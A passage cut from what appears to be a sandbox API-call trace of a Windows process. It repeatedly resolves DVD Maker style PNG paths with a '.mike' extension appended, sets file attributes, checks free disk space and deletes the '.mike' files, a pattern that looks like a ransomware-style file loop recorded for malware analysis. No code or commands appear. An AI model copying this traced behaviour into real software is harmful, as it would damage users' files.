Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", lpFilePart=0x0) returned 0x4a [0054.670] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.670] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.677] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png", dwFileAttributes=0x80) returned 0 [0054.678] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.mike", lpFilePart=0x0) returned 0x4f [0054.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.678] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.mike", lpFilePart=0x0) returned 0x4f [0054.679] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\4to3Squareframe_VideoInset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\4to3squareframe_videoinset.png.mike")) returned 1 [0054.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.681] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.682] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", lpFilePart=0x0) returned 0x46 [0054.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.682] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", lpFilePart=0x0) returned 0x41 [0054.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.688] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", lpFilePart=0x0) returned 0x46 [0054.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.688] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", lpFilePart=0x0) returned 0x46 [0054.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.689] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png", dwFileAttributes=0x80) returned 0 [0054.689] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", lpFilePart=0x0) returned 0x46 [0054.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.690] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike", lpFilePart=0x0) returned 0x46 [0054.690] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_glass.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_glass.png.mike")) returned 1 [0054.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.693] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x54 [0054.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.693] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", lpFilePart=0x0) returned 0x4f [0054.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.694] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.694] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.695] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.696] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.697] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x54 [0054.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x54 [0054.698] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.698] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.698] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png", dwFileAttributes=0x80) returned 0 [0054.699] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x54 [0054.699] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.699] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.699] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike", lpFilePart=0x0) returned 0x54 [0054.699] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_selectionsubpicture.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_selectionsubpicture.png.mike")) returned 1 [0054.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.701] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", lpFilePart=0x0) returned 0x4b [0054.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.702] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", lpFilePart=0x0) returned 0x46 [0054.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.702] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.703] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.705] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.705] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", lpFilePart=0x0) returned 0x4b [0054.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.706] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", lpFilePart=0x0) returned 0x4b [0054.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.707] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png", dwFileAttributes=0x80) returned 0 [0054.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", lpFilePart=0x0) returned 0x4b [0054.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.708] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike", lpFilePart=0x0) returned 0x4b [0054.708] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\circleround_videoinset.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circleround_videoinset.png.mike")) returned 1 [0054.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.710] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x49 [0054.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.711] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", lpFilePart=0x0) returned 0x44 [0054.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.711] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.711] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.720] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0054.724] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0054.725] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x49 [0054.725] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.726] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x49 [0054.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.726] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png", dwFileAttributes=0x80) returned 0 [0054.727] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike", lpFilePart=0x0) returned 0x49 [0054.727] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0054.727] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0054.727] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_ButtonGraphic.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\circle_buttongraphic.png.mike")) returned 1 [0054.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0054.729] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0054.729] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0054.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png.mike", lpFilePart=0x0) returned 0x50 [0054.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0054.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Circle_SelectionSubpictureA.png", lpFilePart=0x0) returned 0x4b [0054.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0054.730] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0054.731] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0054.731] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0054.731] SetThreadErrorMode (dwNewMode=0x1, 